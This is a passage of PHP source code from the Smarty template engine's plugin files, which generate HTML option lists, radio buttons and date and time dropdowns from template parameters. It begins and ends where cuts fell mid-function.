                    $selected = smarty_function_escape_special_chars((string)$_val);
                }
                break;
            case 'strict':
                break;
            case 'disabled':
            case 'readonly':
                if (!empty($params[ 'strict' ])) {
                    if (!is_scalar($_val)) {
                        trigger_error(
                            "html_options: {$_key} attribute must be a scalar, only boolean true or string '{$_key}' will actually add the attribute",
                            E_USER_NOTICE
                        );
                    }
                    if ($_val === true || $_val === $_key) {
                        $extra .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_key) . '"';
                    }
                    break;
                }
            // omit break; to fall through!
            // no break
            default:
                if (!is_array($_val)) {
                    $extra .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_val) . '"';
                } else {
                    trigger_error("html_options: extra attribute '{$_key}' cannot be an array", E_USER_NOTICE);
                }
                break;
        }
    }
    if (!isset($options) && !isset($values)) {
        /* raise error here? */
        return '';
    }
    $_html_result = '';
    $_idx = 0;
    if (isset($options)) {
        foreach ($options as $_key => $_val) {
            $_html_result .= smarty_function_html_options_optoutput($_key, $_val, $selected, $id, $class, $_idx);
        }
    } else {
        foreach ($values as $_i => $_key) {
            $_val = isset($output[ $_i ]) ? $output[ $_i ] : '';
            $_html_result .= smarty_function_html_options_optoutput($_key, $_val, $selected, $id, $class, $_idx);
        }
    }
    if (!empty($name)) {
        $_html_class = !empty($class) ? ' class="' . $class . '"' : '';
        $_html_id = !empty($id) ? ' id="' . $id . '"' : '';
        $_html_result =
            '<select name="' . $name . '"' . $_html_class . $_html_id . $extra . '>' . "\n" . $_html_result .
            '</select>' . "\n";
    }
    return $_html_result;
}

/**
 * @param $key
 * @param $value
 * @param $selected
 * @param $id
 * @param $class
 * @param $idx
 *
 * @return string
 */
function smarty_function_html_options_optoutput($key, $value, $selected, $id, $class, &$idx)
{
    if (!is_array($value)) {
        $_key = smarty_function_escape_special_chars($key);
        $_html_result = '<option value="' . $_key . '"';
        if (is_array($selected)) {
            if (isset($selected[ $_key ])) {
                $_html_result .= ' selected="selected"';
            }
        } elseif ($_key === $selected) {
            $_html_result .= ' selected="selected"';
        }
        $_html_class = !empty($class) ? ' class="' . $class . ' option"' : '';
        $_html_id = !empty($id) ? ' id="' . $id . '-' . $idx . '"' : '';
        if (is_object($value)) {
            if (method_exists($value, '__toString')) {
                $value = smarty_function_escape_special_chars((string)$value->__toString());
            } else {
                trigger_error(
                    'html_options: value is an object of class \'' . get_class($value) .
                    '\' without __toString() method',
                    E_USER_NOTICE
                );
                return '';
            }
        } else {
            $value = smarty_function_escape_special_chars((string)$value);
        }
        $_html_result .= $_html_class . $_html_id . '>' . $value . '</option>' . "\n";
        $idx++;
    } else {
        $_idx = 0;
        $_html_result =
            smarty_function_html_options_optgroup(
                $key,
                $value,
                $selected,
                !empty($id) ? ($id . '-' . $idx) : null,
                $class,
                $_idx
            );
        $idx++;
    }
    return $_html_result;
}

/**
 * @param $key
 * @param $values
 * @param $selected
 * @param $id
 * @param $class
 * @param $idx
 *
 * @return string
 */
function smarty_function_html_options_optgroup($key, $values, $selected, $id, $class, &$idx)
{
    $optgroup_html = '<optgroup label="' . smarty_function_escape_special_chars($key) . '">' . "\n";
    foreach ($values as $key => $value) {
        $optgroup_html .= smarty_function_html_options_optoutput($key, $value, $selected, $id, $class, $idx);
    }
    $optgroup_html .= "</optgroup>\n";
    return $optgroup_html;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {html_radios} function plugin
 * File:       function.html_radios.php
 * Type:       function
 * Name:       html_radios
 * Date:       24.Feb.2003
 * Purpose:    Prints out a list of radio input types
 * Params:
 *
 * - name       (optional) - string default "radio"
 * - values     (required) - array
 * - options    (required) - associative array
 * - checked    (optional) - array default not set
 * - separator  (optional) - ie <br> or &nbsp;
 * - output     (optional) - the output next to each radio button
 * - assign     (optional) - assign the output as an array to this variable
 * - escape     (optional) - escape the content (not value), defaults to true
 *
 * Examples:
 *
 * {html_radios values=$ids output=$names}
 * {html_radios values=$ids name='box' separator='<br>' output=$names}
 * {html_radios values=$ids checked=$checked separator='<br>' output=$names}
 *
 * @link    https://www.smarty.net/manual/en/language.function.html.radios.php {html_radios}
 *          (Smarty online manual)
 * @author  Christopher Kvarme <christopher.kvarme@flashjab.com>
 * @author  credits to Monte Ohrt <monte at ohrt dot com>
 * @version 1.0
 *
 * @param array                    $params   parameters
 * @param Smarty_Internal_Template $template template object
 *
 * @return string
 * @uses    smarty_function_escape_special_chars()
 * @throws \SmartyException
 */
function smarty_function_html_radios($params, Smarty_Internal_Template $template)
{
    $template->_checkPlugins(
        array(
            array(
                'function' => 'smarty_function_escape_special_chars',
                'file'     => SMARTY_PLUGINS_DIR . 'shared.escape_special_chars.php'
            )
        )
    );
    $name = 'radio';
    $values = null;
    $options = null;
    $selected = null;
    $separator = '';
    $escape = true;
    $labels = true;
    $label_ids = false;
    $output = null;
    $extra = '';
    foreach ($params as $_key => $_val) {
        switch ($_key) {
            case 'name':
            case 'separator':
                $$_key = (string)$_val;
                break;
            case 'checked':
            case 'selected':
                if (is_array($_val)) {
                    trigger_error('html_radios: the "' . $_key . '" attribute cannot be an array', E_USER_WARNING);
                } elseif (is_object($_val)) {
                    if (method_exists($_val, '__toString')) {
                        $selected = smarty_function_escape_special_chars((string)$_val->__toString());
                    } else {
                        trigger_error(
                            'html_radios: selected attribute is an object of class \'' . get_class($_val) .
                            '\' without __toString() method',
                            E_USER_NOTICE
                        );
                    }
                } else {
                    $selected = (string)$_val;
                }
                break;
            case 'escape':
            case 'labels':
            case 'label_ids':
                $$_key = (bool)$_val;
                break;
            case 'options':
                $$_key = (array)$_val;
                break;
            case 'values':
            case 'output':
                $$_key = array_values((array)$_val);
                break;
            case 'radios':
                trigger_error(
                    'html_radios: the use of the "radios" attribute is deprecated, use "options" instead',
                    E_USER_WARNING
                );
                $options = (array)$_val;
                break;
            case 'assign':
                break;
            case 'strict':
                break;
            case 'disabled':
            case 'readonly':
                if (!empty($params[ 'strict' ])) {
                    if (!is_scalar($_val)) {
                        trigger_error(
                            "html_options: {$_key} attribute must be a scalar, only boolean true or string '$_key' will actually add the attribute",
                            E_USER_NOTICE
                        );
                    }
                    if ($_val === true || $_val === $_key) {
                        $extra .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_key) . '"';
                    }
                    break;
                }
            // omit break; to fall through!
            // no break
            default:
                if (!is_array($_val)) {
                    $extra .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_val) . '"';
                } else {
                    trigger_error("html_radios: extra attribute '{$_key}' cannot be an array", E_USER_NOTICE);
                }
                break;
        }
    }
    if (!isset($options) && !isset($values)) {
        /* raise error here? */
        return '';
    }
    $_html_result = array();
    if (isset($options)) {
        foreach ($options as $_key => $_val) {
            $_html_result[] =
                smarty_function_html_radios_output(
                    $name,
                    $_key,
                    $_val,
                    $selected,
                    $extra,
                    $separator,
                    $labels,
                    $label_ids,
                    $escape
                );
        }
    } else {
        foreach ($values as $_i => $_key) {
            $_val = isset($output[ $_i ]) ? $output[ $_i ] : '';
            $_html_result[] =
                smarty_function_html_radios_output(
                    $name,
                    $_key,
                    $_val,
                    $selected,
                    $extra,
                    $separator,
                    $labels,
                    $label_ids,
                    $escape
                );
        }
    }
    if (!empty($params[ 'assign' ])) {
        $template->assign($params[ 'assign' ], $_html_result);
    } else {
        return implode("\n", $_html_result);
    }
}

/**
 * @param $name
 * @param $value
 * @param $output
 * @param $selected
 * @param $extra
 * @param $separator
 * @param $labels
 * @param $label_ids
 * @param $escape
 *
 * @return string
 */
function smarty_function_html_radios_output(
    $name,
    $value,
    $output,
    $selected,
    $extra,
    $separator,
    $labels,
    $label_ids,
    $escape
) {
    $_output = '';
    if (is_object($value)) {
        if (method_exists($value, '__toString')) {
            $value = (string)$value->__toString();
        } else {
            trigger_error(
                'html_options: value is an object of class \'' . get_class($value) .
                '\' without __toString() method',
                E_USER_NOTICE
            );
            return '';
        }
    } else {
        $value = (string)$value;
    }
    if (is_object($output)) {
        if (method_exists($output, '__toString')) {
            $output = (string)$output->__toString();
        } else {
            trigger_error(
                'html_options: output is an object of class \'' . get_class($output) .
                '\' without __toString() method',
                E_USER_NOTICE
            );
            return '';
        }
    } else {
        $output = (string)$output;
    }
    if ($labels) {
        if ($label_ids) {
            $_id = smarty_function_escape_special_chars(
                preg_replace(
                    '![^\w\-\.]!' . Smarty::$_UTF8_MODIFIER,
                    '_',
                    $name . '_' . $value
                )
            );
            $_output .= '<label for="' . $_id . '">';
        } else {
            $_output .= '<label>';
        }
    }
    $name = smarty_function_escape_special_chars($name);
    $value = smarty_function_escape_special_chars($value);
    if ($escape) {
        $output = smarty_function_escape_special_chars($output);
    }
    $_output .= '<input type="radio" name="' . $name . '" value="' . $value . '"';
    if ($labels && $label_ids) {
        $_output .= ' id="' . $_id . '"';
    }
    if ($value === $selected) {
        $_output .= ' checked="checked"';
    }
    $_output .= $extra . ' />' . $output;
    if ($labels) {
        $_output .= '</label>';
    }
    $_output .= $separator;
    return $_output;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {html_select_date} plugin
 * Type:     function
 * Name:     html_select_date
 * Purpose:  Prints the dropdowns for date selection.
 * ChangeLog:
 *
 *            - 1.0 initial release
 *            - 1.1 added support for +/- N syntax for begin
 *              and end year values. (Monte)
 *            - 1.2 added support for yyyy-mm-dd syntax for
 *              time value. (Jan Rosier)
 *            - 1.3 added support for choosing format for
 *              month values (Gary Loescher)
 *            - 1.3.1 added support for choosing format for
 *              day values (Marcus Bointon)
 *            - 1.3.2 support negative timestamps, force year
 *              dropdown to include given date unless explicitly set (Monte)
 *            - 1.3.4 fix behaviour of 0000-00-00 00:00:00 dates to match that
 *              of 0000-00-00 dates (cybot, boots)
 *            - 2.0 complete rewrite for performance,
 *              added attributes month_names, *_id
 *
 * @link    https://www.smarty.net/manual/en/language.function.html.select.date.php {html_select_date}
 *           (Smarty online manual)
 * @version 2.0
 * @author  Andrei Zmievski
 * @author  Monte Ohrt <monte at ohrt dot com>
 * @author  Rodney Rehm
 *
 * @param array                     $params parameters
 *
 * @param \Smarty_Internal_Template $template
 *
 * @return string
 * @throws \SmartyException
 */
function smarty_function_html_select_date($params, Smarty_Internal_Template $template)
{
    $template->_checkPlugins(
        array(
            array(
                'function' => 'smarty_function_escape_special_chars',
                'file'     => SMARTY_PLUGINS_DIR . 'shared.escape_special_chars.php'
            )
        )
    );
    // generate timestamps used for month names only
    static $_month_timestamps = null;
    static $_current_year = null;
    if ($_month_timestamps === null) {
        $_current_year = date('Y');
        $_month_timestamps = array();
        for ($i = 1; $i <= 12; $i++) {
            $_month_timestamps[ $i ] = mktime(0, 0, 0, $i, 1, 2000);
        }
    }
    /* Default values. */
    $prefix = 'Date_';
    $start_year = null;
    $end_year = null;
    $display_days = true;
    $display_months = true;
    $display_years = true;
    $month_format = '%B';
    /* Write months as numbers by default  GL */
    $month_value_format = '%m';
    $day_format = '%02d';
    /* Write day values using this format MB */
    $day_value_format = '%d';
    $year_as_text = false;
    /* Display years in reverse order? Ie. 2000,1999,.... */
    $reverse_years = false;
    /* Should the select boxes be part of an array when returned from PHP?
       e.g. setting it to "birthday", would create "birthday[Day]",
       "birthday[Month]" & "birthday[Year]". Can be combined with prefix */
    $field_array = null;
    /* <select size>'s of the different <select> tags.
       If not set, uses default dropdown. */
    $day_size = null;
    $month_size = null;
    $year_size = null;
    /* Unparsed attributes common to *ALL* the <select>/<input> tags.
       An example might be in the template: all_extra ='class ="foo"'. */
    $all_extra = null;
    /* Separate attributes for the tags. */
    $day_extra = null;
    $month_extra = null;
    $year_extra = null;
    /* Order in which to display the fields.
       "D" -> day, "M" -> month, "Y" -> year. */
    $field_order = 'MDY';
    /* String printed between the different fields. */
    $field_separator = "\n";
    $option_separator = "\n";
    $time = null;

    // $all_empty = null;
    // $day_empty = null;
    // $month_empty = null;
    // $year_empty = null;
    $extra_attrs = '';
    $all_id = null;
    $day_id = null;
    $month_id = null;
    $year_id = null;
    foreach ($params as $_key => $_value) {
        switch ($_key) {
            case 'time':
                $$_key = $_value; // we'll handle conversion below
                break;
            case 'month_names':
                if (is_array($_value) && count($_value) === 12) {
                    $$_key = $_value;
                } else {
                    trigger_error('html_select_date: month_names must be an array of 12 strings', E_USER_NOTICE);
                }
                break;
            case 'prefix':
            case 'field_array':
            case 'start_year':
            case 'end_year':
            case 'day_format':
            case 'day_value_format':
            case 'month_format':
            case 'month_value_format':
            case 'day_size':
            case 'month_size':
            case 'year_size':
            case 'all_extra':
            case 'day_extra':
            case 'month_extra':
            case 'year_extra':
            case 'field_order':
            case 'field_separator':
            case 'option_separator':
            case 'all_empty':
            case 'month_empty':
            case 'day_empty':
            case 'year_empty':
            case 'all_id':
            case 'month_id':
            case 'day_id':
            case 'year_id':
                $$_key = (string)$_value;
                break;
            case 'display_days':
            case 'display_months':
            case 'display_years':
            case 'year_as_text':
            case 'reverse_years':
                $$_key = (bool)$_value;
                break;
            default:
                if (!is_array($_value)) {
                    $extra_attrs .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_value) . '"';
                } else {
                    trigger_error("html_select_date: extra attribute '{$_key}' cannot be an array", E_USER_NOTICE);
                }
                break;
        }
    }
    // Note: date() is faster than strftime()
    // Note: explode(date()) is faster than date() date() date()

    if (isset($time) && is_array($time)) {
        if (isset($time[$prefix . 'Year'])) {
            // $_REQUEST[$field_array] given
            foreach ([
                         'Y' => 'Year',
                         'm' => 'Month',
                         'd' => 'Day'
                     ] as $_elementKey => $_elementName) {
                $_variableName = '_' . strtolower($_elementName);
                $$_variableName =
                    isset($time[$prefix . $_elementName]) ? $time[$prefix . $_elementName] :
                        date($_elementKey);
            }
        } elseif (isset($time[$field_array][$prefix . 'Year'])) {
            // $_REQUEST given
            foreach ([
                         'Y' => 'Year',
                         'm' => 'Month',
                         'd' => 'Day'
                     ] as $_elementKey => $_elementName) {
                $_variableName = '_' . strtolower($_elementName);
                $$_variableName = isset($time[$field_array][$prefix . $_elementName]) ?
                    $time[$field_array][$prefix . $_elementName] : date($_elementKey);
            }
        } else {
            // no date found, use NOW
            [$_year, $_month, $_day] = explode('-', date('Y-m-d'));
        }
    } elseif (isset($time) && preg_match("/(\d*)-(\d*)-(\d*)/", $time, $matches)) {
        $_year = $_month = $_day = null;
        if ($matches[1] > '') $_year = (int) $matches[1];
        if ($matches[2] > '') $_month = (int) $matches[2];
        if ($matches[3] > '') $_day = (int) $matches[3];
    } elseif ($time === null) {
        if (array_key_exists('time', $params)) {
            $_year = $_month = $_day = null;
        } else {
            [$_year, $_month, $_day] = explode('-', date('Y-m-d'));
        }
    } else {
        $template->_checkPlugins(
            array(
                array(
                    'function' => 'smarty_make_timestamp',
                    'file'     => SMARTY_PLUGINS_DIR . 'shared.make_timestamp.php'
                )
            )
        );
        $time = smarty_make_timestamp($time);
        [$_year, $_month, $_day] = explode('-', date('Y-m-d', $time));
    }

    // make syntax "+N" or "-N" work with $start_year and $end_year
    // Note preg_match('!^(\+|\-)\s*(\d+)$!', $end_year, $match) is slower than trim+substr
    foreach (array(
        'start',
        'end'
    ) as $key) {
        $key .= '_year';
        $t = $$key;
        if ($t === null) {
            $$key = (int)$_current_year;
        } elseif ($t[ 0 ] === '+') {
            $$key = (int)($_current_year + (int)trim(substr($t, 1)));
        } elseif ($t[ 0 ] === '-') {
            $$key = (int)($_current_year - (int)trim(substr($t, 1)));
        } else {
            $$key = (int)$$key;
        }
    }
    // flip for ascending or descending
    if (($start_year > $end_year && !$reverse_years) || ($start_year < $end_year && $reverse_years)) {
        $t = $end_year;
        $end_year = $start_year;
        $start_year = $t;
    }
    // generate year <select> or <input>
    if ($display_years) {
        $_extra = '';
        $_name = $field_array ? ($field_array . '[' . $prefix . 'Year]') : ($prefix . 'Year');
        if ($all_extra) {
            $_extra .= ' ' . $all_extra;
        }
        if ($year_extra) {
            $_extra .= ' ' . $year_extra;
        }
        if ($year_as_text) {
            $_html_years =
                '<input type="text" name="' . $_name . '" value="' . $_year . '" size="4" maxlength="4"' . $_extra .
                $extra_attrs . ' />';
        } else {
            $_html_years = '<select name="' . $_name . '"';
            if ($year_id !== null || $all_id !== null) {
                $_html_years .= ' id="' . smarty_function_escape_special_chars(
                        $year_id !== null ?
                            ($year_id ? $year_id : $_name) :
                            ($all_id ? ($all_id . $_name) :
                                $_name)
                    ) . '"';
            }
            if ($year_size) {
                $_html_years .= ' size="' . $year_size . '"';
            }
            $_html_years .= $_extra . $extra_attrs . '>' . $option_separator;
            if (isset($year_empty) || isset($all_empty)) {
                $_html_years .= '<option value="">' . (isset($year_empty) ? $year_empty : $all_empty) . '</option>' .
                                $option_separator;
            }
            $op = $start_year > $end_year ? -1 : 1;
            for ($i = $start_year; $op > 0 ? $i <= $end_year : $i >= $end_year; $i += $op) {
                $_html_years .= '<option value="' . $i . '"' . ($_year == $i ? ' selected="selected"' : '') . '>' . $i .
                                '</option>' . $option_separator;
            }
            $_html_years .= '</select>';
        }
    }
    // generate month <select> or <input>
    if ($display_months) {
        $_extra = '';
        $_name = $field_array ? ($field_array . '[' . $prefix . 'Month]') : ($prefix . 'Month');
        if ($all_extra) {
            $_extra .= ' ' . $all_extra;
        }
        if ($month_extra) {
            $_extra .= ' ' . $month_extra;
        }
        $_html_months = '<select name="' . $_name . '"';
        if ($month_id !== null || $all_id !== null) {
            $_html_months .= ' id="' . smarty_function_escape_special_chars(
                    $month_id !== null ?
                        ($month_id ? $month_id : $_name) :
                        ($all_id ? ($all_id . $_name) :
                            $_name)
                ) . '"';
        }
        if ($month_size) {
            $_html_months .= ' size="' . $month_size . '"';
        }
        $_html_months .= $_extra . $extra_attrs . '>' . $option_separator;
        if (isset($month_empty) || isset($all_empty)) {
            $_html_months .= '<option value="">' . (isset($month_empty) ? $month_empty : $all_empty) . '</option>' .
                             $option_separator;
        }
        for ($i = 1; $i <= 12; $i++) {
            $_val = sprintf('%02d', $i);
            $_text = isset($month_names) ? smarty_function_escape_special_chars($month_names[ $i ]) :
                ($month_format === '%m' ? $_val : @strftime($month_format, $_month_timestamps[ $i ]));
            $_value = $month_value_format === '%m' ? $_val : @strftime($month_value_format, $_month_timestamps[ $i ]);
            $_html_months .= '<option value="' . $_value . '"' . ($_val == $_month ? ' selected="selected"' : '') .
                             '>' . $_text . '</option>' . $option_separator;
        }
        $_html_months .= '</select>';
    }
    // generate day <select> or <input>
    if ($display_days) {
        $_extra = '';
        $_name = $field_array ? ($field_array . '[' . $prefix . 'Day]') : ($prefix . 'Day');
        if ($all_extra) {
            $_extra .= ' ' . $all_extra;
        }
        if ($day_extra) {
            $_extra .= ' ' . $day_extra;
        }
        $_html_days = '<select name="' . $_name . '"';
        if ($day_id !== null || $all_id !== null) {
            $_html_days .= ' id="' .
                           smarty_function_escape_special_chars(
                               $day_id !== null ? ($day_id ? $day_id : $_name) :
                                   ($all_id ? ($all_id . $_name) : $_name)
                           ) . '"';
        }
        if ($day_size) {
            $_html_days .= ' size="' . $day_size . '"';
        }
        $_html_days .= $_extra . $extra_attrs . '>' . $option_separator;
        if (isset($day_empty) || isset($all_empty)) {
            $_html_days .= '<option value="">' . (isset($day_empty) ? $day_empty : $all_empty) . '</option>' .
                           $option_separator;
        }
        for ($i = 1; $i <= 31; $i++) {
            $_val = sprintf('%02d', $i);
            $_text = $day_format === '%02d' ? $_val : sprintf($day_format, $i);
            $_value = $day_value_format === '%02d' ? $_val : sprintf($day_value_format, $i);
            $_html_days .= '<option value="' . $_value . '"' . ($_val == $_day ? ' selected="selected"' : '') . '>' .
                           $_text . '</option>' . $option_separator;
        }
        $_html_days .= '</select>';
    }
    // order the fields for output
    $_html = '';
    for ($i = 0; $i <= 2; $i++) {
        switch ($field_order[ $i ]) {
            case 'Y':
            case 'y':
                if (isset($_html_years)) {
                    if ($_html) {
                        $_html .= $field_separator;
                    }
                    $_html .= $_html_years;
                }
                break;
            case 'm':
            case 'M':
                if (isset($_html_months)) {
                    if ($_html) {
                        $_html .= $field_separator;
                    }
                    $_html .= $_html_months;
                }
                break;
            case 'd':
            case 'D':
                if (isset($_html_days)) {
                    if ($_html) {
                        $_html .= $field_separator;
                    }
                    $_html .= $_html_days;
                }
                break;
        }
    }
    return $_html;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {html_select_time} function plugin
 * Type:     function
 * Name:     html_select_time
 * Purpose:  Prints the dropdowns for time selection
 *
 * @link   https://www.smarty.net/manual/en/language.function.html.select.time.php {html_select_time}
 *           (Smarty online manual)
 * @author Roberto Berto <roberto@berto.net>
 * @author Monte Ohrt <monte AT ohrt DOT com>
 *
 * @param array                     $params parameters
 *
 * @param \Smarty_Internal_Template $template
 *
 * @return string
 * @uses   smarty_make_timestamp()
 * @throws \SmartyException
 */
function smarty_function_html_select_time($params, Smarty_Internal_Template $template)
{
    $template->_checkPlugins(
        array(
            array(
                'function' => 'smarty_function_escape_special_chars',
                'file'     => SMARTY_PLUGINS_DIR . 'shared.escape_special_chars.php'
            )
        )
    );
    $prefix = 'Time_';
    $field_array = null;
    $field_separator = "\n";
    $option_separator = "\n";
    $time = null;
    $display_hours = true;
    $display_minutes = true;
    $display_seconds = true;
    $display_meridian = true;
    $hour_format = '%02d';
    $hour_value_format = '%02d';
    $minute_format = '%02d';
    $minute_value_format = '%02d';
    $second_format = '%02d';
    $second_value_format = '%02d';
    $hour_size = null;
    $minute_size = null;
    $second_size = null;
    $meridian_size = null;
    $all_empty = null;
    $hour_empty = null;
    $minute_empty = null;
    $second_empty = null;
    $meridian_empty = null;
    $all_id = null;
    $hour_id = null;
    $minute_id = null;
    $second_id = null;
    $meridian_id = null;
    $use_24_hours = true;
    $minute_interval = 1;
    $second_interval = 1;
    $extra_attrs = '';
    $all_extra = null;
    $hour_extra = null;
    $minute_extra = null;
    $second_extra = null;
    $meridian_extra = null;
    foreach ($params as $_key => $_value) {
        switch ($_key) {
            case 'time':
                if (!is_array($_value) && $_value !== null) {
                    $template->_checkPlugins(
                        array(
                            array(
                                'function' => 'smarty_make_timestamp',
                                'file'     => SMARTY_PLUGINS_DIR . 'shared.make_timestamp.php'
                            )
                        )
                    );
                    $time = smarty_make_timestamp($_value);
                }
                break;
            case 'prefix':
            case 'field_array':
            case 'field_separator':
            case 'option_separator':
            case 'all_extra':
            case 'hour_extra':
            case 'minute_extra':
            case 'second_extra':
            case 'meridian_extra':
            case 'all_empty':
            case 'hour_empty':
            case 'minute_empty':
            case 'second_empty':
            case 'meridian_empty':
            case 'all_id':
            case 'hour_id':
            case 'minute_id':
            case 'second_id':
            case 'meridian_id':
            case 'hour_format':
            case 'hour_value_format':
            case 'minute_format':
            case 'minute_value_format':
            case 'second_format':
            case 'second_value_format':
                $$_key = (string)$_value;
                break;
            case 'display_hours':
            case 'display_minutes':
            case 'display_seconds':
            case 'display_meridian':
            case 'use_24_hours':
                $$_key = (bool)$_value;
                break;
            case 'minute_interval':
            case 'second_interval':
            case 'hour_size':
            case 'minute_size':
            case 'second_size':
            case 'meridian_size':
                $$_key = (int)$_value;
                break;
            default:
                if (!is_array($_value)) {
                    $extra_attrs .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_value) . '"';
                } else {
                    trigger_error("html_select_date: extra attribute '{$_key}' cannot be an array", E_USER_NOTICE);
                }
                break;
        }
    }
    if (isset($params[ 'time' ]) && is_array($params[ 'time' ])) {
        if (isset($params[ 'time' ][ $prefix . 'Hour' ])) {
            // $_REQUEST[$field_array] given
            foreach (array(
                'H' => 'Hour',
                'i' => 'Minute',
                's' => 'Second'
            ) as $_elementKey => $_elementName) {
                $_variableName = '_' . strtolower($_elementName);
                $$_variableName =
                    isset($params[ 'time' ][ $prefix . $_elementName ]) ? $params[ 'time' ][ $prefix . $_elementName ] :
                        date($_elementKey);
            }
            $_meridian =
                isset($params[ 'time' ][ $prefix . 'Meridian' ]) ? (' ' . $params[ 'time' ][ $prefix . 'Meridian' ]) :
                    '';
            $time = strtotime($_hour . ':' . $_minute . ':' . $_second . $_meridian);
            list($_hour, $_minute, $_second) = $time = explode('-', date('H-i-s', $time));
        } elseif (isset($params[ 'time' ][ $field_array ][ $prefix . 'Hour' ])) {
            // $_REQUEST given
            foreach (array(
                'H' => 'Hour',
                'i' => 'Minute',
                's' => 'Second'
            ) as $_elementKey => $_elementName) {
                $_variableName = '_' . strtolower($_elementName);
                $$_variableName = isset($params[ 'time' ][ $field_array ][ $prefix . $_elementName ]) ?
                    $params[ 'time' ][ $field_array ][ $prefix . $_elementName ] : date($_elementKey);
            }
            $_meridian = isset($params[ 'time' ][ $field_array ][ $prefix . 'Meridian' ]) ?
                (' ' . $params[ 'time' ][ $field_array ][ $prefix . 'Meridian' ]) : '';
            $time = strtotime($_hour . ':' . $_minute . ':' . $_second . $_meridian);
            list($_hour, $_minute, $_second) = $time = explode('-', date('H-i-s', $time));
        } else {
            // no date found, use NOW
            list($_year, $_month, $_day) = $time = explode('-', date('Y-m-d'));
        }
    } elseif ($time === null) {
        if (array_key_exists('time', $params)) {
            $_hour = $_minute = $_second = $time = null;
        } else {
            list($_hour, $_minute, $_second) = $time = explode('-', date('H-i-s'));
        }
    } else {
        list($_hour, $_minute, $_second) = $time = explode('-', date('H-i-s', $time));
    }
    // generate hour <select>
    if ($display_hours) {
        $_html_hours = '';
        $_extra = '';
        $_name = $field_array ? ($field_array . '[' . $prefix . 'Hour]') : ($prefix . 'Hour');
        if ($all_extra) {
            $_extra .= ' ' . $all_extra;
        }
        if ($hour_extra) {
            $_extra .= ' ' . $hour_extra;
        }
        $_html_hours = '<select name="' . $_name . '"';
        if ($hour_id !== null || $all_id !== null) {
            $_html_hours .= ' id="' .
                            smarty_function_escape_special_chars(
                                $hour_id !== null ? ($hour_id ? $hour_id : $_name) :
                                    ($all_id ? ($all_id . $_name) : $_name)
                            ) . '"';
        }
        if ($hour_size) {
            $_html_hours .= ' size="' . $hour_size . '"';
        }
        $_html_hours .= $_extra . $extra_attrs . '>' . $option_separator;
        if (isset($hour_empty) || isset($all_empty)) {
            $_html_hours .= '<option value="">' . (isset($hour_empty) ? $hour_empty : $all_empty) . '</option>' .
                            $option_separator;
        }
        $start = $use_24_hours ? 0 : 1;
        $end = $use_24_hours ? 23 : 12;
        for ($i = $start; $i <= $end; $i++) {
            $_val = sprintf('%02d', $i);
            $_text = $hour_format === '%02d' ? $_val : sprintf($hour_format, $i);
            $_value = $hour_value_format === '%02d' ? $_val : sprintf($hour_value_format, $i);
            if (!$use_24_hours) {
                $_hour12 = $_hour == 0 ? 12 : ($_hour <= 12 ? $_hour : $_hour - 12);
            }
            $selected = $_hour !== null ? ($use_24_hours ? $_hour == $_val : $_hour12 == $_val) : null;
            $_html_hours .= '<option value="' . $_value . '"' . ($selected ? ' selected="selected"' : '') . '>' .
                            $_text . '</option>' . $option_separator;
        }
        $_html_hours .= '</select>';
    }
    // generate minute <select>
    if ($display_minutes) {
        $_html_minutes = '';
        $_extra = '';
        $_name = $field_array ? ($field_array . '[' . $prefix . 'Minute]') : ($prefix . 'Minute');
        if ($all_extra) {
            $_extra .= ' ' . $all_extra;
        }
        if ($minute_extra) {
            $_extra .= ' ' . $minute_extra;
        }
        $_html_minutes = '<select name="' . $_name . '"';
        if ($minute_id !== null || $all_id !== null) {
            $_html_minutes .= ' id="' . smarty_function_escape_special_chars(
                    $minute_id !== null ?
                        ($minute_id ? $minute_id : $_name) :
                        ($all_id ? ($all_id . $_name) :
                            $_name)
                ) . '"';
        }
        if ($minute_size) {
            $_html_minutes .= ' size="' . $minute_size . '"';
        }
        $_html_minutes .= $_extra . $extra_attrs . '>' . $option_separator;
        if (isset($minute_empty) || isset($all_empty)) {
            $_html_minutes .= '<option value="">' . (isset($minute_empty) ? $minute_empty : $all_empty) . '</option>' .
                              $option_separator;
        }
        $selected = $_minute !== null ? ($_minute - $_minute % $minute_interval) : null;
        for ($i = 0; $i <= 59; $i += $minute_interval) {
            $_val = sprintf('%02d', $i);
            $_text = $minute_format === '%02d' ? $_val : sprintf($minute_format, $i);
            $_value = $minute_value_format === '%02d' ? $_val : sprintf($minute_value_format, $i);
            $_html_minutes .= '<option value="' . $_value . '"' . ($selected === $i ? ' selected="selected"' : '') .
                              '>' . $_text . '</option>' . $option_separator;
        }
        $_html_minutes .= '</select>';
    }
    // generate second <select>
    if ($display_seconds) {
        $_html_seconds = '';
        $_extra = '';
        $_name = $field_array ? ($field_array . '[' . $prefix . 'Second]') : ($prefix . 'Second');
        if ($all_extra) {
            $_extra .= ' ' . $all_extra;
        }
        if ($second_extra) {
            $_extra .= ' ' . $second_extra;
        }
        $_html_seconds = '<select name="' . $_name . '"';
        if ($second_id !== null || $all_id !== null) {
            $_html_seconds .= ' id="' . smarty_function_escape_special_chars(
                    $second_id !== null ?
                        ($second_id ? $second_id : $_name) :
                        ($all_id ? ($all_id . $_name) :
                            $_name)
                ) . '"';
        }
        if ($second_size) {
            $_html_seconds .= ' size="' . $second_size . '"';
        }
        $_html_seconds .= $_extra . $extra_attrs . '>' . $option_separator;
        if (isset($second_empty) || isset($all_empty)) {
            $_html_seconds .= '<option value="">' . (isset($second_empty) ? $second_empty : $all_empty) . '</option>' .
                              $option_separator;
        }
        $selected = $_second !== null ? ($_second - $_second % $second_interval) : null;
        for ($i = 0; $i <= 59; $i += $second_interval) {
            $_val = sprintf('%02d', $i);
            $_text = $second_format === '%02d' ? $_val : sprintf($second_format, $i);
            $_value = $second_value_format === '%02d' ? $_val : sprintf($second_value_format, $i);
            $_html_seconds .= '<option value="' . $_value . '"' . ($selected === $i ? ' selected="selected"' : '') .
                              '>' . $_text . '</option>' . $option_separator;
        }
